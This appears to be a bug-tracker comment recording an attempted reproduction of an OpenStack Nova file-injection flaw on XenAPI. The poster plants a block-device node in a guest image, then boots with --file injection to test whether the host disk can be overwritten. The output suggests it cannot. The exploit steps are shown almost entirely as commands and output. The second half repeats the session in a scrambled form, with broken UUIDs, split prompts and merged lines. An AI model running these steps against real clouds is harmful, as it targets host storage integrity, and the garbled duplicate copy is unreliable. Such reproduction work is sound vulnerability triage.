stack@DevStackOSDomU:~$ nova image-create 23db106a-321d-4033-8368-cc6d91d3d307 ImageWithDev
stack@DevStackOSDomU:~$ echo "Before running an instance" | sudo tee /dev/xvdb
stack@DevStackOSDomU:~$ echo "After running an instance" > test-file
stack@DevStackOSDomU:~$ nova boot --file /host-device=test-file --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_exploit
stack@DevStackOSDomU:~$ strings /dev/xvdb
Before running an instance
stack@DevStackOSDomU:~$ nova list | grep NodevFix_exploit
| ba73ef12-a60a-4e91-b4a0-3046db5131ba | NodevFix_exploit | ACTIVE | - | Running | private=10.0.0.6 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo cat /host-device
After running an instance
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo ls -altr /host-device
-r--r----- 1 root root 26 May 31 15:13 /host-device
And just to check what happened without the file injection:
stack@DevStackOSDomU:~$ nova boot --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_NoInject
stack@DevStackOSDomU:~$ nova list | grep NodevFix_NoInject
| fc3f1a45-6048-4abf-82a5-5b9b352c59fe | NodevFix_NoInject | ACTIVE | - | Running | private=10.0.0.8 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.8 sudo ls -altr /host-device
brw------- 1 root root 202, 16 May 31 15:06 /host-device
As such, it *looks* like the way XenAPI uses vfs will replace the mknod device with the requested file?
After an attempted repro, I'm not convinced that XenAPI is vulnerable:
stack@DevStackO SDomU:~ $ grep flat_injected /etc/nova/nova.conf
flat_injected = True
stack@DevStackO SDomU:~ $ lsblk | grep xvdb
xvdb 202:16 0 1G 0 disk
stack@DevStackO SDomU:~ $ nova boot --image cirros- 0.3.4-x86_ 64-disk --flavor 1 NodevFix SDomU:~ $ nova list | grep NodevFix 321d-4033- 8368-cc6d91d3d3 07 | NodevFix | ACTIVE | - | Running | private=10.0.0.2 |
stack@DevStackO
| 23db106a-
stack@DevStackO SDomU:~ $ ssh cirros@10.0.0.2 sudo mknod /host-device b 202 16 SDomU:~ $ ssh cirros@10.0.0.2 sudo sync
stack@DevStackO
stack@DevStackO SDomU:~ $ nova image-create 23db106a- 321d-4033- 8368-cc6d91d3d3 07 ImageWithDev
stack@DevStackO SDomU:~ $ echo "Before running an instance" | sudo tee /dev/xvdb SDomU:~ $ echo "After running an instance" > test-file
stack@DevStackO
stack@DevStackO SDomU:~ $ nova boot --file /host-device= test-file --image 508c35dd- dc18-40d5- 82f1-58b0180520 a8 --flavor 1 NodevFix_exploit SDomU:~ $ strings /dev/xvdb
stack@DevStackO
Before running an instance
stack@DevStackO SDomU:~ $ nova list | grep NodevFix_exploit a60a-4e91- b4a0-3046db5131 ba | NodevFix_exploit | ACTIVE | - | Running | private=10.0.0.6 |
| ba73ef12-
stack@DevStackO SDomU:~ $ ssh cirros@10.0.0.6 sudo cat /host-device SDomU:~ $ ssh cirros@10.0.0.6 sudo ls -altr /host-device
After running an instance
stack@DevStackO
-r--r----- 1 root root 26 May 31 15:13 /host-device
And just to check what happened without the file injection: SDomU:~ $ nova boot --image 508c35dd- dc18-40d5- 82f1-58b0180520 a8 --flavor 1 NodevFix_NoInject SDomU:~ $ nova list | grep NodevFix_NoInject 6048-4abf- 82a5-5b9b352c59 fe | NodevFix_NoInject | ACTIVE | - | Running | private=10.0.0.8 | SDomU:~ $ ssh cirros@10.0.0.8 sudo ls -altr /host-device
stack@DevStackO
stack@DevStackO
| fc3f1a45-
stack@DevStackO
brw------- 1 root root 202, 16 May 31 15:06 /host-device
As such, it *looks* like the way XenAPI uses vfs will replace the mknod device with the requested file?